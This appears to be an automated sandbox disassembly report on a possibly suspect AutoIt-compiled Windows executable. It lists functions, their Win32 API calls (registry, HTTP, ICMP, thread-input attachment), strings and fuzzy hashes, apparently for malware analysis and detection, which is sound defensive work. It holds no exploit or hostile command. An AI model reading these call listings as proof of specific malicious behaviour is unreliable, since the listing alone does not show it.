                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                              • API String ID: 2420728520-1007645807
                                              • Opcode ID: bc3a18e82e3acea4f1826a57aa3508f710cbdda8a913eef0d102e16d42b5903e
                                              • Instruction ID: 6d0376fe64c26a678c20b906671264d7183753fba4044dd77c5eb8aa62040464
                                              • Opcode Fuzzy Hash: bc3a18e82e3acea4f1826a57aa3508f710cbdda8a913eef0d102e16d42b5903e
                                              • Instruction Fuzzy Hash: 9C115131A9026979D720B7B6DC4AEFF6F7CEBD1B00F04542A7415A60D1EF704945C5B0
                                              APIs
                                              • GetDlgItem.USER32(?,00000001), ref: 00DD5CE2
                                              • GetWindowRect.USER32(00000000,?), ref: 00DD5CFB
                                              • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00DD5D59
                                              • GetDlgItem.USER32(?,00000002), ref: 00DD5D69
                                              • GetWindowRect.USER32(00000000,?), ref: 00DD5D7B
                                              • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00DD5DCF
                                              • GetDlgItem.USER32(?,000003E9), ref: 00DD5DDD
                                              • GetWindowRect.USER32(00000000,?), ref: 00DD5DEF
                                              • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00DD5E31
                                              • GetDlgItem.USER32(?,000003EA), ref: 00DD5E44
                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00DD5E5A
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00DD5E67
                                              Similarity
                                              • API ID: Window$ItemMoveRect$Invalidate
                                              • String ID:
                                              • API String ID: 3096461208-0
                                              • Opcode ID: 6fb1e8f26fa3ebce0e9f9ef5e427afde8323938f5ac722a5c0719e1382790f04
                                              • Instruction ID: ef00aee3ac0f77eabb6d62c95607067ba57f0d2aea87d3b54b608336338ce0af
                                              • Opcode Fuzzy Hash: 6fb1e8f26fa3ebce0e9f9ef5e427afde8323938f5ac722a5c0719e1382790f04
                                              • Instruction Fuzzy Hash: 7B514170B00605AFDF18CF69DD89AAE7BB5FB48700F248229F515E7294D7719E44CB60
                                              APIs
                                                • Part of subcall function 00D89944: GetWindowLongW.USER32(?,000000EB), ref: 00D89952
                                              • GetSysColor.USER32(0000000F), ref: 00D89862
                                              Similarity
                                              • API ID: ColorLongWindow
                                              • String ID:
                                              • API String ID: 259745315-0
                                              • Opcode ID: 5b1e8fc5014cced86511f8d163d3aa4dffb2858aa4fb1b065a81037b34d9c1bf
                                              • Instruction ID: 1fef07c00c9c1fda81f0fb6a79e11c356f1e0d6dadaccae263a2c163f8753458
                                              • Opcode Fuzzy Hash: 5b1e8fc5014cced86511f8d163d3aa4dffb2858aa4fb1b065a81037b34d9c1bf
                                              • Instruction Fuzzy Hash: A7419D31104641AFDB206F399C98BB97BB5EB06320F2C461AF9E2971E1C7319C82DB30
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00DBF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00DD9717
                                              • LoadStringW.USER32(00000000,?,00DBF7F8,00000001), ref: 00DD9720
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00DBF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00DD9742
                                              • LoadStringW.USER32(00000000,?,00DBF7F8,00000001), ref: 00DD9745
                                              • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00DD9866
                                              Strings
                                              Similarity
                                              • API ID: HandleLoadModuleString$Message_wcslen
                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                              • API String ID: 747408836-2268648507
                                              • Opcode ID: 389bbe9164a2e8ed56ecb97d286ce28a0741c9c43e31c0ac9d1e321c1d73ba3d
                                              • Instruction ID: 654f9a9f119a55440382e4e2c7108a816536af0753da9b2b21d5e15309e9a71e
                                              • Opcode Fuzzy Hash: 389bbe9164a2e8ed56ecb97d286ce28a0741c9c43e31c0ac9d1e321c1d73ba3d
                                              • Instruction Fuzzy Hash: EC413A72800219AACB14EBE0CD96DEEB778EF55740F608126F60972192FA356F48CB71
                                              APIs
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00DD07A2
                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00DD07BE
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00DD07DA
                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00DD0804
                                              • CLSIDFromString.COMBASE(?,000001FE), ref: 00DD082C
                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DD0837
                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DD083C
                                              Strings
                                              Similarity
                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                              • API String ID: 323675364-22481851
                                              • Opcode ID: b958ede0bdd736cac735e00e9f94f915a05b3e6e7f0657b2a6d5ed9f64f1e674
                                              • Instruction ID: e2a5e9a37324e29a08cb8f857a07b376eb6028e78e8b5b67a57dc850e5fea53b
                                              • Opcode Fuzzy Hash: b958ede0bdd736cac735e00e9f94f915a05b3e6e7f0657b2a6d5ed9f64f1e674
                                              • Instruction Fuzzy Hash: 67411772810228ABCF11EBA4DC95DEDB778FF54340F54812AE915B32A1EB309E44CBB0
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 00DE7AF3
                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00DE7B8F
                                              • SHGetDesktopFolder.SHELL32(?), ref: 00DE7BA3
                                              • CoCreateInstance.COMBASE(00E0FD08,00000000,00000001,00E36E6C,?), ref: 00DE7BEF
                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00DE7C74
                                              • CoTaskMemFree.COMBASE(?), ref: 00DE7CCC
                                              • SHBrowseForFolderW.SHELL32(?), ref: 00DE7D57
                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00DE7D7A
                                              • CoTaskMemFree.COMBASE(00000000), ref: 00DE7D81
                                              • CoTaskMemFree.COMBASE(00000000), ref: 00DE7DD6
                                              • CoUninitialize.COMBASE ref: 00DE7DDC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                              • String ID:
                                              • API String ID: 2762341140-0
                                              • Opcode ID: dcb7cbfec0f79b4211f507b93a7be59035ac02da7576fafb458c4f3ec50e9d98
                                              • Instruction ID: 37a6d3354cd8e9624d8db091e2a1a9eb345590a534570f37f0d6c5660cb3495e
                                              • Opcode Fuzzy Hash: dcb7cbfec0f79b4211f507b93a7be59035ac02da7576fafb458c4f3ec50e9d98
                                              • Instruction Fuzzy Hash: 04C14C75A04149EFCB14DFA5C884DAEBBF9FF48304B148598E419EB261D731ED85CBA0
                                              APIs
                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E05504
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E05515
                                              • CharNextW.USER32(00000158), ref: 00E05544
                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E05585
                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E0559B
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E055AC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: MessageSend$CharNext
                                              • String ID:
                                              • API String ID: 1350042424-0
                                              • Opcode ID: 4b783f3cfd2191cb5344a9ab1d83a3830f7905ddcfbe0f9fab0c0b75fc9d0356
                                              • Instruction ID: d7e9daec505d4f992795cef67ce7e05f552a532bebf34dd1f4b0e727c1e7f63e
                                              • Opcode Fuzzy Hash: 4b783f3cfd2191cb5344a9ab1d83a3830f7905ddcfbe0f9fab0c0b75fc9d0356
                                              • Instruction Fuzzy Hash: 3F617836900608AEDF208F95DC84AFF3BB9EB0A724F105145F925BA2D0D7719AC5DF61
                                              APIs
                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00DCFAAF
                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00DCFB08
                                              • VariantInit.OLEAUT32(?), ref: 00DCFB1A
                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00DCFB3A
                                              • VariantCopy.OLEAUT32(?,?), ref: 00DCFB8D
                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00DCFBA1
                                              • VariantClear.OLEAUT32(?), ref: 00DCFBB6
                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00DCFBC3
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DCFBCC
                                              • VariantClear.OLEAUT32(?), ref: 00DCFBDE
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DCFBE9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                              • String ID:
                                              • API String ID: 2706829360-0
                                              • Opcode ID: 927cfcfa8f814035bcdf29ee03c49ab20be38245a91ea71ba0175b6ada2b589e
                                              • Instruction ID: eb73fc0aeeae87ac36e039d09311b1be96007432d98b24dc2b360a50e8577dfc
                                              • Opcode Fuzzy Hash: 927cfcfa8f814035bcdf29ee03c49ab20be38245a91ea71ba0175b6ada2b589e
                                              • Instruction Fuzzy Hash: BE413D35A0021A9FCB00DF65C854EEEBBBAFF48344F108169F955A7261DB31AD85CBB0
                                              APIs
                                              • WSAStartup.WS2_32(00000101,?), ref: 00DF05BC
                                              • inet_addr.WS2_32(?), ref: 00DF061C
                                              • gethostbyname.WS2_32(?), ref: 00DF0628
                                              • IcmpCreateFile.IPHLPAPI ref: 00DF0636
                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00DF06C6
                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00DF06E5
                                              • IcmpCloseHandle.IPHLPAPI(?), ref: 00DF07B9
                                              • WSACleanup.WS2_32 ref: 00DF07BF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                              • String ID: Ping
                                              • API String ID: 1028309954-2246546115
                                              • Opcode ID: a7173b38521def04aa9714e4d87f8795e107f81bd4b9ef73ba338b045a13c196
                                              • Instruction ID: 7f75109b45b81f51d60c98e6e2b7cb4734c779a24647e7c52f30831a4364e969
                                              • Opcode Fuzzy Hash: a7173b38521def04aa9714e4d87f8795e107f81bd4b9ef73ba338b045a13c196
                                              • Instruction Fuzzy Hash: E9918D756042019FD720DF25C488F2ABBE0EF44318F19C5A9F5699B6A2C770ED85CFA1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: _wcslen$BuffCharLower
                                              • String ID: cdecl$none$stdcall$winapi
                                              • API String ID: 707087890-567219261
                                              • Opcode ID: 747906c6941dcb7423ed4be1453a10a7cb94c7d5c5938fd69fd90145b32ec869
                                              • Instruction ID: 7d08e136cb1d6ec27dc5edfcb25197c25265197efba48df94720e9bd51d447d8
                                              • Opcode Fuzzy Hash: 747906c6941dcb7423ed4be1453a10a7cb94c7d5c5938fd69fd90145b32ec869
                                              • Instruction Fuzzy Hash: CE51B472A0011AABCF14DF68C8518BEB7A1FF64324B268229F655E7280EB31DD40D7B1
                                              APIs
                                              • CoInitialize.OLE32 ref: 00DF3774
                                              • CoUninitialize.COMBASE ref: 00DF377F
                                              • CoCreateInstance.COMBASE(?,00000000,00000017,00E0FB78,?), ref: 00DF37D9
                                              • IIDFromString.COMBASE(?,?), ref: 00DF384C
                                              • VariantInit.OLEAUT32(?), ref: 00DF38E4
                                              • VariantClear.OLEAUT32(?), ref: 00DF3936
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                              • API String ID: 636576611-1287834457
                                              • Opcode ID: 5234094fde788cc8aa54d8d83c68db7e0b9560e924e25c6ec87a5b5e5e3ce91d
                                              • Instruction ID: f3c91ddd8a8049c925a013b743901b0fbafdfc31abb81e1bf72a7ec0ba4f61cd
                                              • Opcode Fuzzy Hash: 5234094fde788cc8aa54d8d83c68db7e0b9560e924e25c6ec87a5b5e5e3ce91d
                                              • Instruction Fuzzy Hash: 1861C5B0608305AFD310EF54C849F6ABBE4EF44750F168909FA8597291D774EE88CBB2
                                              APIs
                                              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00DE33CF
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00DE33F0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: LoadString$_wcslen
                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                              • API String ID: 4099089115-3080491070
                                              • Opcode ID: d71ae0df0c631a8bf414db765354d66e8b7439f0dcc7f7d35a1654e21021732b
                                              • Instruction ID: 666acd3d1b80937559d638a06d2cb1dc9e6c0aa4d6f811baab413b1312e1c70f
                                              • Opcode Fuzzy Hash: d71ae0df0c631a8bf414db765354d66e8b7439f0dcc7f7d35a1654e21021732b
                                              • Instruction Fuzzy Hash: 4851AE72800209AADF15EBA0CD56EEEB778EF14340F248166F50973192EB316F98DB71
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: _wcslen$BuffCharUpper
                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                              • API String ID: 1256254125-769500911
                                              • Opcode ID: 0a354ce893baf54adda1478e14b6a12a385bbae740e60323858f2afd8abe4dfc
                                              • Instruction ID: 245dfee233a681554478035ee5d01d8042b82eff7133d27e175b6c8c77426888
                                              • Opcode Fuzzy Hash: 0a354ce893baf54adda1478e14b6a12a385bbae740e60323858f2afd8abe4dfc
                                              • Instruction Fuzzy Hash: 1A41B632A00126DBCB105F7D88915BE7BA5EBA577CB2A412BE465DB384E731CD81C7B0
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00DE53A0
                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00DE5416
                                              • GetLastError.KERNEL32 ref: 00DE5420
                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 00DE54A7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: Error$Mode$DiskFreeLastSpace
                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                              • API String ID: 4194297153-14809454
                                              • Opcode ID: 4cae14e8d58cfc6fc9f54f8931e43706203f7485fc35056c6f6e00287baf379e
                                              • Instruction ID: 5d11c83bb3164260b5f4b339acc8706550d012c6e433e806b994dc263adce251
                                              • Opcode Fuzzy Hash: 4cae14e8d58cfc6fc9f54f8931e43706203f7485fc35056c6f6e00287baf379e
                                              • Instruction Fuzzy Hash: A3311435A001449FCB00EF6AD489AAABBF4EF44349F58C065E406DB2D6E771DD86CBB0
                                              APIs
                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E03A9D
                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E03AA0
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E03AC7
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E03AEA
                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E03B62
                                              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00E03BAC
                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00E03BC7
                                              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00E03BE2
                                              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00E03BF6
                                              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00E03C13
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              Similarity
                                              • API ID: MessageSend$LongWindow
                                              • String ID:
                                              • API String ID: 312131281-0
                                              • Opcode ID: 53cc026f29bf43d1fd666a7482ac613ad0dfd930c092cab1b3dc807a511bd1da
                                              • Instruction ID: 8f33d1d4d6af4549b08b9ff048e8e84723a86db268e72659030122452b3e5fc2
                                              • Opcode Fuzzy Hash: 53cc026f29bf43d1fd666a7482ac613ad0dfd930c092cab1b3dc807a511bd1da
                                              • Instruction Fuzzy Hash: B7614775900248AFDB10DFA8CC81EEEB7B8EB49704F104199FA15B72E1D770AE85DB60
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00DDB151
                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB165
                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00DDB16C
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB17B
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DDB18D
                                              • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB1A6
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB1B8
                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB1FD
                                              • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB212
                                              • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB21D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                              • String ID:
                                              APIs
                                              • _free.LIBCMT ref: 00DA2C94
                                                • Part of subcall function 00DA29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000), ref: 00DA29DE
                                                • Part of subcall function 00DA29C8: GetLastError.KERNEL32(00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000,00000000), ref: 00DA29F0
                                              • _free.LIBCMT ref: 00DA2CA0
                                              • _free.LIBCMT ref: 00DA2CAB
                                              • _free.LIBCMT ref: 00DA2CB6
                                              • _free.LIBCMT ref: 00DA2CC1
                                              • _free.LIBCMT ref: 00DA2CCC
                                              • _free.LIBCMT ref: 00DA2CD7
                                              • _free.LIBCMT ref: 00DA2CE2
                                              • _free.LIBCMT ref: 00DA2CED
                                              • _free.LIBCMT ref: 00DA2CFB
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              APIs
                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D71459
                                              • OleUninitialize.OLE32(?,00000000), ref: 00D714F8
                                              • UnregisterHotKey.USER32(?), ref: 00D716DD
                                              • DestroyWindow.USER32(?), ref: 00DB24B9
                                              • FreeLibrary.KERNEL32(?), ref: 00DB251E
                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00DB254B
                                              Similarity
                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                              • String ID: close all
                                              APIs
                                              • SetWindowLongW.USER32(?,000000EB), ref: 00D75C7A
                                                • Part of subcall function 00D75D0A: GetClientRect.USER32(?,?), ref: 00D75D30
                                                • Part of subcall function 00D75D0A: GetWindowRect.USER32(?,?), ref: 00D75D71
                                                • Part of subcall function 00D75D0A: ScreenToClient.USER32(?,?), ref: 00D75D99
                                              • GetDC.USER32 ref: 00DB46F5
                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00DB4708
                                              • SelectObject.GDI32(00000000,00000000), ref: 00DB4716
                                              • SelectObject.GDI32(00000000,00000000), ref: 00DB472B
                                              • ReleaseDC.USER32(?,00000000), ref: 00DB4733
                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00DB47C4
                                              Similarity
                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                              • String ID: U
                                              APIs
                                              • RtlDecodePointer.NTDLL(?), ref: 00DAAFAB
                                              Similarity
                                              • API ID: DecodePointer
                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                              APIs
                                              • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00DE35E4
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • LoadStringW.USER32(00E42390,?,00000FFF,?), ref: 00DE360A
                                              Similarity
                                              • API ID: LoadString$_wcslen
                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                              APIs
                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DEC272
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DEC29A
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DEC2CA
                                              • GetLastError.KERNEL32 ref: 00DEC322
                                              • SetEvent.KERNEL32(?), ref: 00DEC336
                                              • InternetCloseHandle.WININET(00000000), ref: 00DEC341
                                              Similarity
                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                              • String ID:
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00DB3AAF,?,?,Bad directive syntax error,00E0CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00DD98BC
                                              • LoadStringW.USER32(00000000,?,00DB3AAF,?), ref: 00DD98C3
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00DD9987
                                              Similarity
                                              • API ID: HandleLoadMessageModuleString_wcslen
                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                              APIs
                                              • GetParent.USER32 ref: 00DD20AB
                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00DD20C0
                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00DD214D
                                              Similarity
                                              • API ID: ClassMessageNameParentSend
                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                              APIs
                                              Similarity
                                              • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                              • String ID:
                                              APIs
                                                • Part of subcall function 00D88F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D88BE8,?,00000000,?,?,?,?,00D88BBA,00000000,?), ref: 00D88FC5
                                              • DestroyWindow.USER32(?), ref: 00D88C81
                                              • KillTimer.USER32(00000000,?,?,?,?,00D88BBA,00000000,?), ref: 00D88D1B
                                              • DestroyAcceleratorTable.USER32(00000000), ref: 00DC6973
                                              • DeleteObject.GDI32(00000000), ref: 00DC69E6
                                              Similarity
                                              • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                              • String ID:
                                              • API String ID: 2402799130-0
                                              • Opcode ID: 9c37e545d2a88695270ec64bec0e47726d1ab5380b63e5138edc37a8532d8d0d
                                              • Instruction ID: 332e3011917421c8fa9b6dbd880b7b742297cfcdb14191332f781a0fae3c45b6
                                              • Opcode Fuzzy Hash: 9c37e545d2a88695270ec64bec0e47726d1ab5380b63e5138edc37a8532d8d0d
                                              • Instruction Fuzzy Hash: A161AB34102601DFDB25AF26D948B2977F1FB81312F58455CE182AB5A4CB32E8C9EFB0
                                              APIs
                                              • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00E05186
                                              • ShowWindow.USER32(?,00000000), ref: 00E051C7
                                              • ShowWindow.USER32(?,00000005,?,00000000), ref: 00E051CD
                                              • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00E051D1
                                                • Part of subcall function 00E06FBA: DeleteObject.GDI32(00000000), ref: 00E06FE6
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E0520D
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E0521A
                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E0524D
                                              • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00E05287
                                              • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00E05296
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                              • String ID:
                                              • API String ID: 3210457359-0
                                              • Opcode ID: d3a9ffed24b09ba80ab2ed402bc010125edbd4d2b5c1fddb58318a62e786454b
                                              • Instruction ID: 8bd9449151f412685cf519974db13c3c2ec7a5229799d5b07b735150bad8d542
                                              • Opcode Fuzzy Hash: d3a9ffed24b09ba80ab2ed402bc010125edbd4d2b5c1fddb58318a62e786454b
                                              • Instruction Fuzzy Hash: 3B517932A41A09FEEB209F25CC4ABDA3BA5AF05324F246112F615B62E0C771A9C0DF51
                                              APIs
                                              • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00DC6890
                                              • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00DC68A9
                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00DC68B9
                                              • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00DC68D1
                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DC68F2
                                              • DestroyCursor.USER32(00000000), ref: 00DC6901
                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DC691E
                                              • DestroyCursor.USER32(00000000), ref: 00DC692D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
